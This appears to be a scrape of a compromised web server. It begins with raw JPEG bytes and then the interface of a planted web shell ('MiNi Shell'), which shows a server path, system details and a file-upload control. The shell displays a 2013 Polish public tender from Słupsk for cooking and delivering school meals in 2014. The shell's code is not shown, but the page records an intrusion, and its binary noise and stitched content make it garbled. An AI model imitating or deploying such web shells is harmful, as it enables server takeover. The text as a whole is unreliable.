JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/470864-N-2013.html

<p class="kh_header"><b>Słupsk: Usługa dot. przygotowania i dowożenia gorących posiłków uczniom szkół oraz innym osobom, w tym skierowanym przez Gminny Ośrodek Pomocy Społecznej w Słupsku do jednostek Gminy Słupsk w roku 2014</b><br>
<b>Numer ogłoszenia: 470864 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej w Słupsku , ul. Sportowa 9A, 76-200 Słupsk, woj. pomorskie, tel. 0-59 840 16 82, 847 51 33, faks 0-59 840 16 82, 847 51 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.gops.slupsk.ug.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa dot. przygotowania i dowożenia gorących posiłków uczniom szkół oraz innym osobom, w tym skierowanym przez Gminny Ośrodek Pomocy Społecznej w Słupsku do jednostek Gminy Słupsk w roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot przetargu obejmuje usługę dotyczącą przygotowania i dowożenia gorących posiłków uczniom szkół oraz innym osobom, w tym skierowanym przez Gminny Ośrodek Pomocy Społecznej w Słupsku do jednostek Gminy Słupsk w roku kalendarzowym 2014.

2. Z podziałem na zadania i zapotrzebowaniem w ciągu całego roku kalendarzowego 2014 od 01 stycznia do 31 grudnia - łącznie:
1) Zadanie nr 1 - Szkoła Podstawowa we Wrześciu - 22 687 posiłków,
2) Zadanie nr 2 - Szkoła Podstawowa w Bierkowie - 21 578 posiłków;
3) Zadanie nr 3:
a) przy świetlicy w Bruskowie Wielkim - 4 755 posiłków;
b) przy sklepie w Redęcinie - 2 118 posiłków;
c) przy sklepie w Gaci - 9 042 posiłków;
4) Zadanie nr 4 - Zespół Szkół w Siemianicach - 35 378 posiłków;
5) Zadanie nr 5 - Zespół Szkół w Jezierzycach - 46 271 posiłków,
6) Zadanie nr 6:
a) przy sklepie w Kukowie - 7 521 posiłków;
b) przy świetlicy w Rogawicy - 3 582 posiłków;
7) Zadanie nr 7 - Szkoła Podstawowa we Włynkówku - 28 127 posiłków;
8) Zadanie nr 8 - przy świetlicy w Strzelinie - 8 814 posiłków;
9) Zadanie nr 9 - Szkoła Podstawowa w Głobinie - 29 153 posiłków;
10) Zadanie nr 10:
a) przy świetlicy w Warblewie - 3 504 posiłków;
b) przy świetlicy w Kusowie - 6 777 posiłków;
11) Łączna szacunkowa liczba dni, w których będą wydawane posiłki - 241,
12) Łączna ilość posiłków w okresie trwania umowy - 229 307.

3. Zadania z podziałem na miesiące w roku kalendarzowym 2014 (ETAP I - 109 dni) i zapotrzebowaniem:

W OKRESIE OD 01 STYCZNIA DO 30 CZERWCA 2014 r.

1) Zadanie nr 1 - Szkoła Podstawowa we Wrześciu - do 105 dzieci / osób - 11 445 posiłków,
2) Zadanie nr 2 - Szkoła Podstawowa w Bierkowie - do 92 dzieci / osób - 10 028 posiłków;
3) Zadanie nr 3:
a) przy świetlicy w Bruskowie Wielkim - do 20 dzieci / osób - 2 180 posiłków;
b) przy sklepie w Redęcinie - do 8 osób - 872 posiłków;
c) przy sklepie w Gaci - do 37 dzieci / osób - 4 033 posiłków;
4) Zadanie nr 4 - Zespół Szkół w Siemianicach - do 196 dzieci / osób - 21 364 posiłków;
5) Zadanie nr 5 - Zespół Szkół w Jezierzycach - do 226 dzieci / osób - 24 634 posiłków;
6) Zadanie nr 6:
a) przy sklepie w Kukowie - do 31 dzieci / osób - 3 379 posiłków;
b) przy świetlicy w Rogawicy - do 12 dzieci / osób - 1 308 posiłków;
7) Zadanie nr 7 - Szkoła Podstawowa we Włynkówku - do 121 dzieci / osób - 13 189 posiłków;
8) Zadanie nr 8 - przy świetlicy w Strzelinie - do 29 dzieci / osób - 3 161 posiłków;
9) Zadanie nr 9 - Szkoła Podstawowa w Głobinie - do 129 dzieci / osób - 14 061 posiłków
10) Zadanie nr 10:
a) przy świetlicy w Warblewie - do 14 dzieci / osób - 1 526 posiłków;
b) przy świetlicy w Kusowie - do 27 dzieci / osób - 2 943 posiłków;
11) Łączna szacunkowa liczba dni, w których będą wydawane posiłki - 109;
12) Łączna ilość posiłków w okresie trwania umowy - 114 123.


4. Zadania z podziałem na miesiące w roku kalendarzowym 2014 (ETAP II - 45 dni) i zapotrzebowaniem:

W OKRESIE OD 01 LIPCA DO 31 SIERPNIA 2014 r.

1) Zadanie nr 1 - Szkoła Podstawowa we Wrześciu - okres wakacyjny - brak;
2) Zadanie nr 2 - Szkoła Podstawowa w Bierkowie - okres wakacyjny - brak;
3) Zadanie nr 3:
a) przy świetlicy w Bruskowie Wielkim - do 23 dzieci / osób - 1 035 posiłków;
b) przy sklepie w Redęcinie - do 14 dzieci / osób - 630 posiłków;
c) sklepie w Gaci - do 48 dzieci / osób - 2 160 posiłków;
4) Zadanie nr 4 - Zespół Szkół w Siemianicach - okres wakacyjny - brak;
5) Zadanie nr 5 - Zespół Szkół w Jezierzycach - okres wakacyjny - brak;
6) Zadanie nr 6:
a) przy sklepie w Kukowie - do 39 dzieci / osób - 1 755 posiłków;
b) przy świetlicy w Rogawicy - do 30 dzieci / osób - 1 350 posiłków;
7) Zadanie nr 7 - okres wakacyjny - brak;
8) Zadanie nr 8 - przy świetlicy w Strzelinie - do 76 dzieci / osób - 3 420 posiłków;
9) Zadanie nr 9 - okres wakacyjny - brak;
10) Zadanie nr 10:
a) przy świetlicy w Warblewie - do 20 dzieci / osób - 900 posiłków;
b) przy świetlicy w Kusowie - do 39 dzieci / osób - 1 755 posiłków;
11) Łączna szacunkowa liczba dni, w których będą wydawane posiłki - 45;
12) Łączna ilość posiłków w okresie trwania umowy - 13 005.


5. Zadania z podziałem na miesiące w roku kalendarzowym 2014 (ETAP III - 77 dni) i zapotrzebowaniem:

W OKRESIE OD 01 WRZEŚNIA DO 31 GRUDNIA 2014 r.

1) Zadanie nr 1 - Szkoła Podstawowa we Wrześciu - do 146 dzieci / osób - 11 242 posiłków;
2) Zadanie nr 2 - Szkoła Podstawowa w Bierkowie - do 150 dzieci / osób - 11 550 posiłków;
3) Zadanie nr 3:
a) przy świetlicy w Bruskowie Wielkim - 20 dzieci / osób - 1 540 posiłków;
b) przy sklepie w Redęcinie - do 8 dzieci / osób - 616 posiłków;
c) przy sklepie w Gaci - do 37 dzieci / osób - 2 849 posiłków;
4) Zadanie nr 4 - Zespół Szkół w Siemianicach - do 182 dzieci / osób - 14 014 posiłków;
5) Zadanie nr 5 - Zespół Szkół w Jezierzycach - do 281 dzieci / osób - 21 637 posiłków;
6) Zadanie nr 6:
a) przy sklepie w Kukowie - do 31 dzieci / osób - 2 387 posiłków;
b) przy świetlicy w Rogawicy - do 12 dzieci / osób - 924 posiłków;
7) Zadanie nr 7 - Szkoła Podstawowa we Włynkówku - do 194 dzieci / osób - 14 938 posiłków;
8) Zadanie nr 8 - przy świetlicy w Strzelinie - do 29 dzieci / osób - 2 233 posiłków;
9) Zadanie nr 9 - Szkoła Podstawowa w Głobinie - do 196 dzieci - 15 092;
10) Zadanie nr 10:
a) przy świetlicy w Warblewie - do 14 dzieci / osób - 1 078 posiłków;
b) przy świetlicy w Kusowie - do 27 dzieci / osób - 2 079 posiłków;
11) Łączna szacunkowa liczba dni, w których będą wydawane posiłki - 77,
12) Łączna ilość posiłków w okresie trwania umowy - 102 179.

6. Ilości posiłków podane w pkt 2 - 5 są ilościami szacunkowymi i jako takie nie mogą stanowić podstawy do wnoszenia przez Wykonawcę jakichkolwiek roszczeń co do ilości faktycznie zamówionych przez Zamawiającego (po podpisaniu umów kierowników jednostek) w toku realizacji umowy w sprawie zamówienia publicznego.
7. Dzienna ilość posiłków  będzie się zmieniać w zależności od frekwencji dzieci i osób odbierających posiłek.
8. Zamawiający zastrzega sobie prawo ograniczenia przedmiotu zamówienia w zakresie ilościowym, w przypadku, gdy z powodów ekonomicznych, bieżących potrzeb lub innych, nie będzie to leżało w interesie Zamawiającego.
9. W związku z ograniczeniem przez Zamawiającego przedmiotu umowy, Wykonawcy nie będą przysługiwały żadne roszczenia w stosunku do Zamawiającego.
10. Rozliczanie w toku realizacji umowy w sprawie zamówienia publicznego następować będzie sukcesywnie w oparciu o faktycznie zamówione posiłki i cenę jednostkową zadeklarowaną w ofercie.
11. Organizacją dostaw posiłków dla każdej jednostki będzie zajmował się odrębnie Kierownik każdej jednostki w oparciu o wzór umowy załączony do SIWZ oddzielnie na każde zadanie.
12. W przypadku posiłków dostarczanych przy świetlicach wiejskich i sklepach, ich dyspozycją i wydawaniem zajmowała się będzie osoba bezpośrednio uprawniona i wskazana przez Zamawiającego (GOPS Słupsk).
13. Kierownicy jednostek (Dyrektorzy Szkół) będą bezpośrednio uprawnieni do konsultowania składu posiłków i godzin dostaw z Wykonawcą w ramach danego zadania z uwzględnieniem zarówno dzieci szkolnych jak i osób odbierających obiady przy świetlicach wiejskich i sklepach.
14. Dyrektorzy Szkół upoważnieni będą do aktualizacji listy dzieci i osób skierowanych do odbioru posiłków w Szkołach, natomiast listy osób odbierających posiłki przy świetlicach i sklepach aktualizować będzie bezpośrednio Zamawiający (GOPS Słupsk).
15. Wymagania jakościowe posiłków:
1) posiłek będzie obejmował trzy razy w tygodniu drugie danie:
a) minimum dwa razy danie mięsne z możliwością zamiany na rybę, w tym:
- kasza, ryż, ziemniaki (zmiennie) - min. 200 g,
- danie mięsne - min. 80 g,
- surówka - 100 g,
b) pozostałe dwa dni w tygodniu posiłek będzie obejmował zupę z wkładką mięsną i pieczywo, w tym:
- zupa - min. 300 ml,
- pieczywo - min. 30 g,
- wkładka - min. 80 g.
2) wymagana kaloryczność każdego posiłku to min. 900 kcal,
3) posiłki muszą spełniać najwyższy standard, na bazie produktów najwyższej jakości i zgodnie z wymogami Państwowego Inspektora Sanitarnego, norm systemu HACCP oraz innych obowiązujących w tym zakresie aktów prawnych,
4) posiłek musi być dostosowany do obowiązujących przepisów norm żywności i żywienia w zakresie dożywiania dzieci i młodzieży. Wartość odżywcza przygotowanych posiłków powinna być zgodna z obowiązującymi przepisami, o dożywianiu dzieci i młodzieży,
5) proponowane menu musi być sporządzane w oparciu o zalecenia i wytyczne osoby wskazanej w ofercie do realizacji zamówienia tj.: dietetyka / technologa żywienia,
6) powtarzalność tego samego rodzaju danego posiłku nie może być częstsza niż raz na dwa tygodnie,
7) zgodnie z wymogami Państwowej Inspekcji Sanitarnej, posiłek w formie kateringu musi zostać wydany w czasie do 4 godzin od momentu jego sporządzenia (wyprodukowania),
8) dla posiłków wydawanych bezpośrednio w Szkołach Zamawiający nie dopuszcza stosowania sztućców oraz talerzy z tworzyw sztucznych (plastiki, papierowe itp.),
9) posiłki przy świetlicach wiejskich i sklepach muszą być wydawane w pojemnikach z tworzyw sztucznych do tego przystosowanych, ponieważ świetlice i sklepy będą punktami organizacyjnymi, gdzie posiłki będą jedynie wydawane, w związku z czym Wykonawca zobowiązany jest w oferowanej cenie przewidzieć zapewnienie jednorazowych pojemników,
10) przykładowe menu zostało określone w załączniku nr 10 do SIWZ, które stanowi wymagany standard jakościowy,
11) Wykonawca zobowiązuje się do minimalnego zastosowania produktów przetworzonych w przygotowywanych posiłkach,
12) wyklucza się posiłki na bazie Fastfood,
13) do przygotowywania posiłków należy używać produktów wysokiej jakości i zawsze świeżych posiadających aktualne terminy ważności, nabytych w źródłach działających zgodnie z obowiązującymi przepisami sanitarnymi i higienicznymi, za co Wykonawca ponosi odpowiedzialność na każdym z etapie realizacji zamówienia,
14) przy tworzeniu jadłospisów należy przewidywać zamienniki dla dzieci alergicznych. Informacja o diecie dziecka zostanie przekazana Wykonawcy w momencie uzyskania informacji od rodzica, w trakcie roku szkolnego najpóźniej na 1 dzień przed podaniem posiłku.
15) posiłki dostarczane przez Wykonawcę winny być transportowane w odpowiednich, przeznaczonych do tego celu pojemnikach termoizolacyjnych wykonanych z tworzywa zabezpieczających posiłki przed wylaniem oraz schłodzeniem, zgodnie z wymaganymi warunkami epidemiologiczno - sanitarnymi dla tego rodzaju transportu,
16. Wykonawca po zatwierdzeniu przez technologa żywienia/dietetyka i uzgodnieniu z Kierownikiem danej jednostki będzie przesyłał co tydzień proponowane menu.
17. Z wcześniejszym co najmniej jednotygodniowym wyprzedzeniem menu będzie mogło być modyfikowane z zachowaniem norm jakościowych i kalorycznych, a każda modyfikacja menu musi zostać zaakceptowana przez Kierownika danej Jednostki, której dotyczy dostawa, przez technologa żywienia/dietetyka oraz przez Wykonawcę.
18. Niedopuszczalne jest modyfikowanie menu bez zgody wszystkich osób wskazanych w pkt 16 i w sposób niezgodny z wymogami ustalonymi w umowie oraz przepisach prawa.
19. Wykonawca zapewnia urozmaicenie jadłospisów poprzez uwzględnianie sezonowości potraw.
20. Wykonawca zobowiązany jest uwzględnić w zaoferowanej cenie koszty osprzętu (termosy, pojemniki itd.), koszty transportu, koszty przygotowania posiłku we własnym lokalu (spełniającym warunki sanitarne) przez osoby posiadające odpowiednie kwalifikacje (kucharz, technolog żywienia/dietetyk).
21. Wykonawca zobowiązany jest zapewnić wymagany standard Sanitarno - Epidemiologiczny w całym procesie sporządzania i dowozu posiłków.
22. Personel Wykonawcy powinien posiadać bieżące przeszkolenie z zakresu BHP oraz HACCP a także aktualne książeczki zdrowia.
23. Wykonawca zobowiązany jest do wyznaczenia stałego przedstawiciela odpowiedzialnego za kontakt z Zamawiającym.
24. Wykonawca odpowiada prawnie za żywienie dzieci przed Powiatowym Państwowym Inspektorem Sanitarnym.
25. Wykonawca ponosi pełną odpowiedzialność cywilną, administracyjną i karną za jakość dostarczanych posiłków oraz skutki wynikające z zaniedbań przy ich przygotowywaniu i transporcie, mogące mieć negatywny wpływ na zdrowie żywionych dzieci i osób.
26. Wykonawca, na każde żądanie Zamawiającego, zobowiązany jest przedstawić wyniki badania mikrobiologicznego żywności.
27. Wykonawca, na każde żądanie Zamawiającego, zobowiązany jest przedstawić Tabelę kaloryczności serwowanych posiłków.
28. W przypadku wyjazdu dzieci szkolnych na wycieczkę Wykonawca winien przygotować w ramach środków przeznaczonych na dany dzień żywieniowy, tzw. suchy prowiant oraz zupę w termosie i napoje w termosie, Wykonawca zapewnia naczynia jednorazowe. O planowanej wycieczce Zamawiający poinformuje Wykonawcę z 3 dniowym wyprzedzeniem. 
29. Personel zatrudniony przez Wykonawcę jest zobowiązany uwzględniać i wprowadzać w życie uwagi Zamawiającego - dotyczące sposobu sporządzania i dowozu posiłków. Upoważnionym do przekazywania uwag jest Kierownik jednostki, lub inna wskazana przez niego na piśmie osoba.
30. Zaleca się przeprowadzenie szczegółowej wizji lokalnej celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy.
31. Rozliczenie za realizację przedmiotu zamówienia będzie następować miesięcznymi fakturami częściowymi, wystawianymi do 5 dnia następnego miesiąca na kwotę wynikającą z:
1) faktycznie dostarczonych w miesiącu posiłków w oparciu o potwierdzone przez Kierowników poszczególnych Jednostek, zestawień faktycznie dostarczonych w miesiącu obiadów,
2) ryczałtowej ceny jednostkowej brutto, przygotowania i dowiezienia posiłku, określonej w ofercie Wykonawcy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - oświadczenie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie w zakresie wykonywania usług objętych zamówieniem, tj. wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, w okresie trzech ostatnich lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi dot. przygotowania i dowożenia posiłków do Jednostek Oświatowych, tj.: przedszkola, oddziały przedszkolne, Szkoły podstawowe, Gimnazja i Szkoły średnie, sporządzony wg Załącznika nr 5 do SIWZ, wraz z dowodami, że wykazane usługi zostały wykonane (lub są wykonywane) należycie. Dowodami są: a) poświadczenie, z tym, że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, lub: 
b) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w ppkt a).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia, tj.: dysponują lokalem przystosowanym do sporządzania posiłków, zgodnie z wymogami Państwowej Powiatowej Inspekcji Sanitarnej - dokument potwierdzający.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują sobami zdolnymi do wykonania zamówienia tj: co najmniej jedną osobą, która posiada kwalifikacje / uprawnienia do wykonywania zawodu dietetyka lub technologa żywienia zbiorowego - oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej realizację zamówienia - oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, w okresie trzech ostatnich lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie usługi dot. przygotowania i dowożenia posiłków do Jednostek Oświatowych, tj.: przedszkola, oddziały przedszkolne, Szkoły podstawowe, Gimnazja i Szkoły średnie według wykazu określonego zał. nr 5 do SIWZ. Zamawiający nie żąda wykazu usług niewykonanych lub wykonywanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
